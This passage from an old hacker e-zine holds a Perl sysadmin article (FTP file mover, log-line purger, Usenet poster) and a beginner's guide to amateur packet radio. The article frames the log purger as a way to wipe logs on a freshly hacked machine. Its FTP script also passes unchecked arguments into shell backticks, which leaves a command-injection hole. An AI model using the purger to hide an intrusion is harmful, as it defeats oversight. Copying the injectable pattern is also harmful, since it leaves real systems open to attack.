  4606. Perl is great for automating some of the tasks involved in maintaining and
  4607. administering a UNIX machine. Because of its text manipulation abilities
  4608. and its access to the shell, Perl can be used to do any of the processes that
  4609. you might ordinarily do by hand.
  4610.  
  4611. The following sections are basically just examples of Perl programs that you
  4612. might use in the daily maintenance of your box.
  4613.  
  4614.  
  4615. Moving Files
  4616. ------------
  4617.  
  4618. If for example you run a secure FTP site, then this is how it might work. 
  4619. Incoming files are placed in an "uploads" directory, when they have been
  4620. checked, they are moved to a "private" directory for retrievel. Permissions
  4621. are set in such a way that the file is not shown in a directory listing, but
  4622. can be retrieved if the filename is known. The person who placed the file on 
  4623. the server is informed via e-mail that the file is now available for 
  4624. download.
  4625.  
  4626. Seeing as directory listings aren't available it would be a good idea to 
  4627. make retrievel of the filename available in all-uppercase and all-lowercase 
  4628. as well as the original filename.
  4629.  
  4630. The following Perl program is to perform all those tasks with a single 
  4631. command. When the file is determined as ready to go onto the FTP site, you
  4632. only need to type: move filename user, where filename is the name of the 
  4633. file to be moved, and user is the e-mail addy of the person who uploaded it
  4634. ie: person to be notified.
  4635.  
  4636.  
  4637.  1: #!/usr/bin/perl
  4638.  2: #
  4639.  3: # Move a file from /uploads to /private
  4640.  4: $file = @ARGV[0];
  4641.  5: $user = @ARGV[1];
  4642.  6: 
  4643.  7: if ($user eq "") {&usage}
  4644.  8: else {
  4645.  9:      if (-e "/home/ftp/uploads/$file")
  4646. 10:           {`cp /home/ftp/uploads/$file /home/ftp/private/$file`;
  4647. 11:           chmod 0644, "/home/ftp/private/$file";
  4648. 12:           `rm -f /home/ftp/uploads/$file`;
  4649. 13:           if (uc($file) ne $file) {
  4650. 14:                $ucfile = uc($file);
  4651. 15:                `ln /home/ftp/private/$file /home/ftp/private/$ucfile`;
  4652. 16:               }
  4653. 17:           if (lc($file) ne $file) {
  4654. 18:                 $lcfile = lc($file);
  4655. 19:                 `ln /home/ftp/private/$file /home/ftp/private/$lcfile`;
  4656. 20:                }
  4657. 21: 
  4658. 22: # Send mail
  4659. 23: open (MAIL, "| /usr/sbin/sendmail -t ftpadmin,$user");
  4660. 24: print MAIL <<EndMail;
  4661. 25: To: ftpadmin,$user
  4662. 26: From: ftpadmin
  4663. 27: Subject: File ($file) moved
  4664. 28: 
  4665. 29: The file $file has been moved
  4666. 30: The file is now available as
  4667. 31: ftp://ftp.domain.com/private/$file
  4668. 32: 
  4669. 33: ftpadmin\@domain.com
  4670. 34: ================================
  4671. 35: EndMail
  4672. 36: close MAIL;
  4673. 37: }
  4674. 38: 
  4675. 39:     else { # File does not exist
  4676. 40:          print "File does not exist!\n";
  4677. 41:          }   # End else (-e $file)
  4678. 42: 
  4679. 43: } # End else ($user eq "")
  4680. 44: 
  4681. 45: sub usage {
  4682. 46: print "move <filename> <username>\n";
  4683. 47: print "where <username> is the user that you are moving this for.\n\n";
  4684. 48: }
  4685.  
  4686. NOTE: domain.com would be replaced with the domain associated with your box.
  4687.  
  4688. Without going through the entire code line by line, the following paragraphs
  4689. look at some of the points that demonstrate the powah and syntax of Perl.
  4690.  
  4691. In lines 4-5, the array @ARGV contains all the command-line arguments. The 
  4692. place where one argument ends and another begins is taken to be every space,
  4693. unless arguments are given in quotes.
  4694.  
  4695. In line 9, the -e file tests for the existence of a file. If the file does 
  4696. not exist, perhaps the user gave the wrong filename, or one of the other
  4697. server admins beat you to it. Perl enables you to open a pipe to some other 
  4698. process and print data to it. This allows Perl to *use* any other program
  4699. that has an interactive user interface, such as sendmail, or an FTP session.
  4700. Thats basically the purpose of line 23.
  4701.  
  4702. The << syntax allows you to print multiple lines of text until the EOF string 
  4703. is encountered. This eliminates the necessity to have multiple print
  4704. commands following one another, ie:
  4705.  
  4706. 24: print MAIL <<EndMail;
  4707. ...
  4708. 35: EndMail
  4709.  
  4710. The subroutine syntax allows modularization of code into functions. Sub-
  4711. routines are declared with the syntax shown on lines 45-48, and called with
  4712. the & notation, as on line 7:
  4713.  
  4714. 7: ... {&usage}
  4715. ...
  4716. 45: sub usage {
  4717. ...
  4718. 48: }
  4719.  
  4720.  
  4721. Purging Logs
  4722. ------------
  4723.  
  4724. Many programs maintain some variety of logs. Often, much of the info in these
  4725. logz is redundant or useless (or maybe unwanted, like if the logz are on a 
  4726. box j3w just hax0red). The following Perl program will remove all lines from
  4727. a file that contain a particular word or phrase, so lines that are not
  4728. important or are unwanted can be purged.
  4729.  
  4730.  1: #!/usr/bin/perl
  4731.  2: #
  4732.  3: #       Be careful using this program!!
  4733.  4: #       This will remove all lines that contain the given word
  4734.  5: #
  4735.  6: #       Usage:  remove <word> <file>
  4736.  7: ###########
  4737.  8: $word=@ARGV[0];
  4738.  9: $file=@ARGV[1];
  4739. 10: 
  4740. 11: unless ($file)  {
  4741. 12: print "Usage:  remove <word> <file>\n"; }
  4742. 13: 
  4743. 14: else    {
  4744. 15: open (FILE, "$file");
  4745. 16: @lines=<FILE>;
  4746. 17: close FILE;
  4747. 18: 
  4748. 19: # remove the offending lines
  4749. 20: @lines = grep (!/$word/, @lines);
  4750. 21: 
  4751. 22: #  Write it back
  4752. 23: open (NEWFILE, ">$file");
  4753. 24: for (@lines)    { print NEWFILE }
  4754. 25: close NEWFILE;
  4755. 26:         }  #  End else
  4756.  
  4757.  
  4758. This listing is pretty self-explanatory. It reads in the file and then moves 
  4759. the lines that contain that string using Perl's grep command, which is
  4760. similar to the standard UNIX grep. If you save this as a file called 'remove'
  4761. and place it in your path, you will have a quick way to purge server logs of
  4762. unwanted messages.
  4763.  
  4764.  
  4765. Posting to Usenet
  4766. -----------------
  4767.  
  4768. If you need to post to Usenet periodically, for example, to post a FAQ, the 
  4769. following program can automoate the process for you. In the following code, 
  4770. the text that is posted is read in from a text file, but you can modify it so
  4771. that your input can come from anywhere.
  4772.  
  4773. This program uses the Net::NNTP module, which is a standard part of the Perl
  4774. distribution.
  4775.  
  4776.  1: #!/usr/bin/perl
  4777.  2: open (POST, "post.file");
  4778.  3: @post = <POST>;
  4779.  4: close POST;
  4780.  5: use Net::NNTP;
  4781.  6: 
  4782.  7: $NNTPhost = 'news';
  4783.  8: 
  4784.  9: $nntp = Net::NNTP->new($NNTPhost)
  4785. 10:         or die "Cannot contact $NNTPhost: $!";
  4786. 11: 
  4787. 12: # $nntp->debug(1);
  4788. 13: $nntp->post()
  4789. 14:         or die "Could not post article: $!";
  4790. 15: $nntp->datasend("Newsgroups: news.announce\n");
  4791. 16: $nntp->datasend("Subject: FAQ - Frequently Asked Questions\n");
  4792. 17: $nntp->datasend("From: L4m3r <lame\@loser.com>\n");
  4793. 18: $nntp->datasend("\n\n");
  4794. 19: for (@post)     {
  4795. 20: $nntp->datasend($_);
  4796. 21: }
  4797. 22: 
  4798. 23: $nntp->quit;
  4799.  
  4800.  
  4801. Shout Outs
  4802. ----------
  4803.  
  4804. Thats it for this file, hope its of some help to all you uber hakkahs out 
  4805. there and I hope that you now realise (if you didn't before) the full 
  4806. potential of Perl.
  4807.  
  4808. [hybr1d] [bodie] [JaSuN] [fORCE] [mranon] [shadow-x] [exstriad] [sonicborg]
  4809. [qubik] [downtime] [dialt0ne] [elf] [n1no] [sintax] [xio] [psyclone] [knight]
  4810.  
  4811. big up to the d4rkcyde crew
  4812.  
  4813. K33p 1t r34l, P34c3
  4814.  
  4815.  
  4816. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  4817. -->]OO[:[ Packet Radio ]:::::[OO--[ by JaSuN ]---[ jasun@phreaker.net ]::::::
  4818. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  4819.  
  4820.  
  4821.          --oOo--> Packet Radio - Beginners Guide ]------------------
  4822.          --oOo--> --------------------------------------------------
  4823.          --oOo--> Main Document Introduction                    ]---         
  4824.          --oOo--> Amateur Radio Network Introduction            ]--- 
  4825.          --oOo--> Amateur Radio Packet Network                  ]--- 
  4826.          --oOo--> What Is Communication?                        ]--- 
  4827.          --oOo--> What Is Data Communication?                   ]---                
  4828.          --oOo--> Introduction to Packet Radio                  ]---
  4829.          --oOo--> --* What Is Packet Radio & What Are Its Uses? ]---         
  4830.          --oOo--> --* Hardware Required                         ]---
  4831.          --oOo--> --* Packet Radio <-> Internet Communications  ]---
  4832.          --oOo--> --* Packet Radio User Groups                  ]---
  4833.          --oOo--> --* Software Required                         ]---
  4834.          --oOo--> Radio Amateur Examination                     ]---
  4835.          --oOo--> Legal Issues                                  ]---
  4836.          --oOo--> Glossary Of Terms                             ]---
  4837.          --oOo--> Further Reading                               ]---
  4838.          --oOo--> Conclusion                                    ]---
  4839.          --oOo--> Disclaimer                                    ]---                    
  4840.          --OoO--> ============================================= ]---
  4841.  
  4842. Main Document Introduction:
  4843. ===========================
  4844. In this article I will cover some aspects about the different data
  4845. communication systems that are in use today on the Amateur Radio Network.
  4846. This article will mainly talk about Packet Radio, but I will write future
  4847. ones on the other data modes that are also in use and a more in depth one
  4848. about Packet Radio, talking more about the hardware, how to wire everything
  4849. up and frequencies used.  This is basically a beginners guide, for people
  4850. that don't know anything about Packet/Amateur and want to get into it.
  4851.  
  4852. Amateur Radio Network Introduction:
  4853. ===================================
  4854. Hopefully by the end of this document, you will understand a little more
  4855. about how it all works and what is currently in widespread use/being
  4856. implemented. I will discuss the main topics so you could then get yourself
  4857. set-up with a station, provided you wanted to and passed the Radio Amateur
  4858. Examination test. See the end of this article for further details about the
  4859. exam/licence.
  4860.  
  4861. Amateur Radio Packet Network:
  4862. =============================
  4863. This section will give you the information needed to communicate on the ever
  4864. increasing Packet Radio Network.  It will provide information on the required
  4865. hardware equipment, software and also the actual technical side behind the
  4866. protocols frequently used.  It will cover the basics, and then hopefully
  4867. cover some of the more detailed and experimental ideas/trials of new things
  4868. that are currently being tested, as well as some good resource sites across
  4869. the Internet.
  4870.  
  4871. What Is Communication?:
  4872. =======================
  4873. Have you ever stopped for a period of time and wondered what it would be like
  4874. without all of the common communications methods that we use and take for
  4875. granted today?  What would we do without a Telephone, the Internet or
  4876. Television? Most of us would be lost without these things, maybe we could
  4877. manage but it would sure be more difficult.  Whoever you are, whatever you
  4878. do, the chances are you use/enjoy/need one of the above.  All of us
  4879. communicate in one way or another, those things just make it easier.
  4880.  
  4881. What Is Data Communication?:
  4882. ============================
  4883. Most of you will have some idea about what data communication is and how it
  4884. can be used in a large number of ways.  However, it would probably surprise
  4885. you about the number of people that don't have any idea at all.  If you are
  4886. slightly interested in computers, the Internet or Telecommunications, then
  4887. you will know something, probably even something that the next person does
  4888. not. Communications in itself, is about sharing information and using it to
  4889. our best advantage.
  4890.  
  4891. There is the general category of Data Communications, but these can be
  4892. divided into smaller sub-categories, either way they will be:
  4893.  
  4894. 1. Wireless Communications
  4895. 2. Landline Communications
  4896.  
  4897. These can then be further divided into sub-categories,
  4898. listed below are a few examples:
  4899.  
  4900. 1. Telecommunications
  4901. 2. Amateur Radio
  4902. 3. Internet
  4903.  
  4904. All of those are large networks, which make our life of communications a
  4905. lot easier, but not forgetting a lot more enjoyable.
  4906.  
  4907. What Is Packet Radio & What Can It Be Used For?
  4908. ===============================================
  4909. Packet Radio is a means of transfer data over wireless links across varying
  4910. distances.  It can be used for all kinds of different applications and being
  4911. it's main use in the Amateur Radio hobby, there is constantly all kinds of
  4912. new ideas are being tested out and implemented not only on the software side,
  4913. but also on the hardware side of things, as development of new Packet Radio
  4914. TNC'S are being developed commercially and by knowledgeable amateurs.
  4915.  
  4916. Some of the main uses today are Converse, sending private messages though the
  4917. BBS Network, lond distance (DX) contacts and much more.
  4918.  
  4919. Hardware Required:
  4920. ==================
  4921. To be able to use Packet Radio you will need a number of Hardware items, as
  4922. well as the Software.  You will need a Transceiver, TNC, antenna, power
  4923. supply, computer and software.  It is possible to operate a station
  4924. automatically without the use of a computer, by using the TNC alone. However, you will still
  4925. need a computer to configure it and the software and to see what is
  4926. happening on the air.
  4927.  
  4928. The hardware can be expensive, depending on what it is.  If you are operating
  4929. on CB, it will cost a lot less, as CB equipment is a lot cheaper to buy.
  4930. If you want to operate on Amateur Radio, it will cost more, but there is a
  4931. lot more to explore and expand on.
  4932.  
  4933. Packet Radio <-> Internet Communications:
  4934. =========================================
  4935. There are a number of Packet <-> Internet links now available that offer
  4936. different advantages and services, depending on what they were intended for.
  4937. Some links are in place to connect the Converse Network, which is like
  4938. Internet Relay Chat (IRC) but over Packet Radio.  The links feed the data off
  4939. into the Internet, which then appears on the Packet Network in another
  4940. country.
  4941.  
  4942. By using the Internet, it not only speeds up the Converse Network, but it also
  4943. forms a backup if any of the hard Packet Links happen to fail.  By using the
  4944. Internet as an international link, it allows Packet users from different
  4945. countries to talk to each other, as if it were only over Packet, the link
  4946. could be easily lost if a few links were to loose connection with each other.
  4947.  
  4948. There are also many more services that are available to Packet users, such as
  4949. SMTP/NNTP mail, telnet and more.  It has to be restricted, so that no
  4950. unauthorised users can access the Packet Network from the Internet without
  4951. being licensed.  The class of IP's 44.*.*.* has been allocated to the
  4952. Amateur Packet Radio Network (AMPR).  The use of IP over the Packet Network
  4953. is slowly increasing, because it has its advantages over the old systems.
  4954.  
  4955. It is also possible to play games such as Quake over a fast Packet link,
  4956. anything above 9k6 will be okay to play.  Even though it might be a little
  4957. slow it does work.  It would also need to be a Duplex link.  One thing about
  4958. that though is that you probably would not be able to do it for extended
  4959. periods of time because of the transmitter, it would eventually overheat and
  4960. could damage the transceiver.
  4961.  
  4962. Packet Radio User Groups
  4963. ========================
  4964. Most development across the network is due to the implementation of user
  4965. groups that cover the whole of the United Kingdom and also across the world.
  4966. As the network is so large, for any major changes to be implemented,
  4967. the Amateur Radio hobby has devoted organisations such as the RSGB
  4968. (Radio Society Of Great Britain) to help with not only Packet Radio related
  4969. issues, but the whole hobby in general.
  4970.  
  4971. It may be referred to as "amateur" but in actual fact, a large portion of the
  4972. hobby and in the data communications areas in particular, have a lot of 
  4973. "experts" that work in the industry everyday and input their knowledge.
  4974.  
  4975. Software Required:
  4976. ==================
  4977. A lot of Software is available to get going on Packet.  As a user, you will
  4978. simply need one of the many clients available, most of which are available
  4979. for a number of operating systems.  If you were running a BBS, the most
  4980. commonly used server Software is FBB which is available for
  4981. Linux, Windows and DOS.
  4982.  
  4983. Radio Amateurs Examination
  4984. ==========================
  4985. The RAE is an exam issued by City & Guilds, which will give you a
  4986. qualification and also allow you to get a valid licence/callsign to legally
  4987. use the allotted Amateur Radio frequencies.  Usually, you would buy one of
  4988. the books that detail what is contained within the exam, then either go
  4989. though it on your own or goto lessons.
  4990.  
  4991. Then you go and take the exam when you think you are ready, although the
  4992. exams are held usually at colleges/clubs about twice a year, usually in May
  4993. and November.  The exam is multiple choice and is really just based on common
  4994. sense, what is detailed in some of the exam books you do not need to know deeply, 
  4995. just a slight knowledge will suffice.  You will probably forget it later on,
  4996. unless you actually are interested in any of it and continue to use the 
  4997. information/techniques in actual practice.
  4998.  
  4999. Legal Issues
  5000. ============
  5001. At this point I must stress that to legally use the dedicated Amateur Bands
  5002. for anything at all, be it voice/data, you must hold a valid Amateur Radio
  5003. Licence. The users will report any unauthorised use to the Radio
  5004. Communications Agency (part of the Department Of Trade And Industry) and you
  5005. will get traced if you continue.  I would suggest that if you would like to
  5006. try anything out, join a club first, or visit one and see what it is all
  5007. about.
  5008.  
  5009. Also, you could try using Packet/other data modes on the Citizens Band radio
  5010. on 27mhz, although illegal to use Packet Radio on the CB bands in the UK even 
  5011. with a valid CB licence, to be honest anything goes when it relates to CB, as far
  5012. as today's users are concerned.  You will have much more to explore if you
  5013. decide to move into the Amateur Bands and it is much more organised and
  5014. established. Although in other countries, such as Germany, CB Packet Radio is
  5015. also widespread, CB Packet Radio is only illegal in the UK now.
  5016.  
  5017. Glossary Of Terms:
  5018. ==================
  5019. There are too many terms to list here, so I will just list a few common ones
  5020. that also apply to information contained within this document.  There are a
  5021. number of good resources on the Internet that list all of them you will need
  5022. to know.
  5023.  
  5024. AFSK:
  5025.     Audio Frequency-Shift Keying is a method of digital modulation.
  5026.     It is a good way of sending digital information over radiowaves.
  5027.     This method is in use by both Packet Radio modems and Telephone
  5028.     modems.  A zero (0) is sent using one tone and a one (1) is sent
  5029.     using a different tone.
  5030.  
  5031. AX.25:   
  5032.     The protocol used on the Packet Radio Network for
  5033.     the transmission of data.  This protocol borrows the link layer from
  5034.     X.25 (aka LAPB) modifies it and then adds a datagram address/routing
  5035.     header on the front.  The envelope contains the callsign of the
  5036.     originating station, the callsign of the target station, addressing,
  5037.     control and error checking and synchronising.
  5038.  
  5039. BBS:
  5040.     A Bulletin Board System is used for storing and sending bulletins across
  5041.     the network for users, forwarding private individual messages to the
  5042.     correct home BBS for whichever user the message is for, also allowing
  5043.     users to connect to stations which they cannot reach directly by using
  5044.     the BBS node and many others afterwards if needed.  You can also use the
  5045.     BBS to Digipete if that option is available on the BBS in question.
  5046.  
  5047. BPQ:
  5048.     BPQ is the most common Network Node/Packet Switch Software you will find
  5049.     that controls Nodes.  As it is the most common and widely used,
  5050.     they are all compatible with each other and work much better with
  5051.     less initial problems.
  5052.  
  5053. PMS:
  5054.     A Personal Mailbox System is usually built into a TNC and used for 
  5055.     storing private messages to the Sysop of that station.  They can be
  5056.     used for more, e.g. storing bulletins etc, but this is where the BBS
  5057.     stations come into play.
  5058.  
  5059. TNC:
  5060.     Terminal Node Controller is a piece of hardware (the modem)
  5061.     which encodes/decodes data packets and talks to the software to
  5062.     display the information on your monitor.  A TNC is self-maintaining
  5063.     and can be left acting as a Network Node/Digipeter without the need
  5064.     for anything other than the radio set-up.  It can also have a built in
  5065.     PMS for storing of messages.  The TNC also provides error detection
  5066.     as it assembles/disassembles the data packets.
  5067.  
  5068. Further Reading:
  5069. ================
  5070. http://www.packetradio.com - Good site, dedicated to Packet Radio
  5071. http://members.xoom.com/ukpg - United Kingdom Packet Group (Now international)
  5072. http://www.rsgb.org - Radio Society Of Great Britain
  5073.  
  5074. Conclusion
  5075. ==========
  5076. I hope that you enjoyed reading this article and that you actually learned
  5077. some new information from it.  Even if you are not really interested in
  5078. wireless data communications or Packet Radio in general, you may still have
  5079. found something in here that you never knew before reading it.  If you have
  5080. any comments or suggestions about this article, please feel free to send me
  5081. an email to: jasun@phreaker.net I hope this gave you a little insight into
  5082. Packet.
  5083.  
  5084. Look out for more articles from me in the future. I have made this information as
  5085. accurate as possible to my knowledge, but don't complain if I made an error,
  5086. most of this was written at times around 4am in the morning. 
  5087.  
  5088. Disclaimer:
  5089. ===========
  5090. This document is for educational *INTERNAL USE ONLY*
  5091. It is for educational purposes only, the information contained within it must
  5092. not be used to cause damage to any person/system.  What you do with this 
  5093. information is your business, but anything that arises from its misuse cannot be
  5094. held against anybody, apart from yourself.
  5095.  
  5096.  
  5097.  
  5098. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  5099. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  5100. -->[OO]:::::::::::::::[ Outness ]::::::::::::::::::::::::::::::::::::::::::::
  5101. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  5102. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  5103.  
  5104. There ya have it, another quality issue of f41th brought to you by the
  5105. D4RKCYDE collective [ http://darkcyde.system7.org ] Keep reading, and
  5106. remember.. h4x0r1ng just 41nt d4 s4m3 w1th0ut pr0-plus c4ff3n3 p1llz. WERD to
  5107. everyone in #darkcyde, and everyone that helps with f41th, you own. Bow Down.
  5108. -----------------------------------------------------------------------------
  5109.  
  5110.          #############     ################     ###############    
  5111.          #############     ################     ###############
  5112.          #####             #####      #####     ######
  5113.          #####             #####      #####     ######
  5114.          #############     #####      #####     ##############
  5115.          #############     #####      #####     ##############
  5116.          #####             #####      #####     ######
  5117.          #####             #####      #####     ######
  5118.          ##############    ################     ######
  5119.          ##############    ################     ######
  5120.  
  5121.  
  5122.           [  D 4 R K C Y D E                                    ]
  5123.           [                                                     ]
  5124.           [  http://darkcyde.system7.org http://hybrid.DTMF.org ]       
  5125.           [  #darkcyde EFNET (no lamerz)                        ]
  5126.  
  5127.                     '...find us on the PSTN b1tch...'
  5128.  
  5129.  
  5130.  
  5131.  
  5132.  
  5133.